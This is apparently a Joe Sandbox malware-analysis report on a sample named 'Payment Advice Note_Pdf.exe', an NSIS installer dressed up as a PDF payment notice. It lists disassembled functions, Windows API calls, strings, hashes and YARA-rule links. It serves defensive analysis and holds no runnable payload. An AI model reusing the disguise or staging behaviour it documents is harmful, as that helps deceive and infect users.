Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 2257fd8ab512881f6a75dfd94c1adc6df68088fb9580fd68ddbbd23d113039a2
Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
Opcode Fuzzy Hash: 2257fd8ab512881f6a75dfd94c1adc6df68088fb9580fd68ddbbd23d113039a2
Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39

Function 0040493A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
wsprintfW.USER32 ref: 004049E4
SetDlgItemTextW.USER32(?,00422708), ref: 004049F7

Strings

%u.%u%s%s, xrefs: 004049C5

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
Instruction ID: f455ebafcbecf6c6930287b8ee8bcbe2db44ea01d8d71c40407b913fda14730a
Opcode Fuzzy Hash: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
Instruction Fuzzy Hash: D611D87364412867DB10A6BD9C45EAF3288DB85374F250237FA26F61D2DA798C6182D8

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
Instruction ID: a67f43666b390050b7c93cc16dc22df3288c4645dfbd1c9967af83c22614668d
Opcode Fuzzy Hash: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
Instruction Fuzzy Hash: 7C21B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A409B69

Function 00405ADB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

Part of subcall function 00405A7E: CharNextW.USER32(?,?,00424F10,00409300,00405AF2,00424F10,00424F10, 4<v,?,C:\Users\user\AppData\Local\Temp\,00405830,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 00405A8C
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9

lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10, 4<v,?,C:\Users\user\AppData\Local\Temp\,00405830,?,763C3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"), ref: 00405B34
GetFileAttributesW.KERNEL32(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10, 4<v,?,C:\Users\user\AppData\Local\Temp\,00405830,?,763C3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B44

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405ADB
4<v, xrefs: 00405ADD

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4<v$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-688449625
Opcode ID: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
Instruction ID: a8deb24d6afa2735206f329f0351f59021ff10951cf48c606255c952c9ad3203
Opcode Fuzzy Hash: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
Instruction Fuzzy Hash: CBF04921304E5215D622323A1C44AAF3554CFC1364705073BB861721E1CB3C9943DE7E

Function 004059D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059D9
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059E3
lstrcatW.KERNEL32(?,00409014), ref: 004059F5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059D3

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
Instruction ID: e27ca5b6c843e4ca6b7b7419ee0e736cc2f4fee1b15a20ddc9c218eb8b1253ea
Opcode Fuzzy Hash: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
Instruction Fuzzy Hash: 1DD0A761101930AAC212E7488C00DDF729CAE55345341003BF107B30B1C7781D5287FE

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,00403504,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
Instruction ID: e23ac89653febb243e72dcf23735aaa2031a226b5032255065ec6e4c9dbb6a99
Opcode Fuzzy Hash: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
Instruction Fuzzy Hash: B3F0F431909220EBC6516B54FD4C9DB7F75FB4571270149B7F001B11E4D7B95C818BAD

Function 004050F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405121
CallWindowProcW.USER32(?,?,?,?), ref: 00405172

Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141

Strings

, xrefs: 00405102

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
Instruction ID: 7511a9737e1ae187a562f2e55163cfa394ea92b9daba136d2a61478abf79871a
Opcode Fuzzy Hash: e363e72c763df8ca6100096d80b3df6051651a231830df88c35e98c850c37b72
Instruction Fuzzy Hash: 41015E71A40709BBDF219F11DD84B6B3626E794754F144136FA017E1D1C3BA8C919E2D

Function 004037D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,763C3420,00000000,C:\Users\user\AppData\Local\Temp\,004037AB,004035C0,?), ref: 004037ED
GlobalFree.KERNEL32(?), ref: 004037F4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
Instruction ID: 66f8bddb8dfdb1964ca55d912e2b06e4102c5475863404a2afc710826c1672a2
Opcode Fuzzy Hash: b2d9a1ddbba9b9f3ee0b0ea3bd9ee1620ba51efa6b86355baead2e8ed11cdd1d
Instruction Fuzzy Hash: CAE0C2B39051206BC7311F04EC08B1AB7BC7F88B32F05416AE8407B3B087742C528BC9

Function 00405A1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A25
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,C:\Users\user\Desktop\Payment Advice Note_Pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A35

Strings

C:\Users\user\Desktop, xrefs: 00405A1F

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
Instruction ID: 5bbf66532c1e6c52d9ac91e78c5b81189c295a76ad9a8eb5813a93f974e07d29
Opcode Fuzzy Hash: bd96f5d222dd2e219d7186a4e9023239cf4eadd8ba915765e0199ed169867e67
Instruction Fuzzy Hash: 95D05EB29109209AD322A708DC419AF73ACEF113407464466F401A31A5D3785D818AAA

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.1317193990.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1317160855.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317225994.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1317253099.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B59 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B81
CharNextA.USER32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B92
lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B

Memory Dump Source

Source File: 00000000.00000002.1303817138.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1303789428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303870127.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1303900007.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1304115213.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9

Analysis Process: Payment Advice Note_Pdf.exePID: 7280, Parent PID: 9048COMMON

Non-executed Functions

Function 0040326A Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 401stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040328C
GetVersion.KERNEL32 ref: 00403292
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
OleInitialize.OLE32(00000000), ref: 004032E9
SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 0040332D
CharNextW.USER32(00000000,00434000,00000020), ref: 00403354

Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422

GetTempPathW.KERNEL32(00000400,00436800), ref: 0040348F
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004034A0
lstrcatW.KERNEL32(00436800,\Temp), ref: 004034AC
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004034C0
lstrcatW.KERNEL32(00436800,Low), ref: 004034C8
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004034D9
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004034E1
DeleteFileW.KERNEL32(00436000), ref: 004034F5

Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C

OleUninitialize.OLE32(?), ref: 004035C0
ExitProcess.KERNEL32 ref: 004035E2
lstrcatW.KERNEL32(00436800,~nsu,00434000,00000000,?), ref: 004035F5
lstrcatW.KERNEL32(00436800,0040926C,00436800,~nsu,00434000,00000000,?), ref: 00403604
lstrcatW.KERNEL32(00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 0040360F
lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,?), ref: 0040361B
SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403637
DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,0042A000,?), ref: 00403691
CopyFileW.KERNEL32(00437800,0041FEC8,00000001), ref: 004036A5
CloseHandle.KERNEL32(00000000,0041FEC8,0041FEC8,?,0041FEC8,00000000), ref: 004036D2
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
OpenProcessToken.ADVAPI32(00000000), ref: 00403708
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
AdjustTokenPrivileges.ADVAPI32 ref: 00403740
ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
ExitProcess.KERNEL32 ref: 00403788

Strings

SeShutdownPrivilege, xrefs: 00403717
UXTHEME, xrefs: 004032B1
TMP, xrefs: 004034DC
NSIS Error, xrefs: 0040330B
SETUPAPI, xrefs: 004032C5
.tmp, xrefs: 00403609
\Temp, xrefs: 004034A6
TEMP, xrefs: 004034D4
USERENV, xrefs: 004032BB
~nsu, xrefs: 004035ED
Error launching installer, xrefs: 00403577
Low, xrefs: 004034C2

Memory Dump Source

Source File: 00000002.00000002.1404753023.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1404721343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404789131.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1404859591.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Payment Advice Note_Pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-3972089011
Opcode ID: 9b9f35efcc8bb6d7656a683dde830fbd6ff0cb0b9cfc9c69a418ceb725a0aba7
Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
Opcode Fuzzy Hash: 9b9f35efcc8bb6d7656a683dde830fbd6ff0cb0b9cfc9c69a418ceb725a0aba7
Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E

Function 00404AFA Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B12
GetDlgItem.USER32(?,00000408), ref: 00404B1D
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
LoadBitmapW.USER32(0000006E), ref: 00404B7A
SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
DeleteObject.GDI32(00000000), ref: 00404BF0
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
ShowWindow.USER32(?,00000005), ref: 00404D4A
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
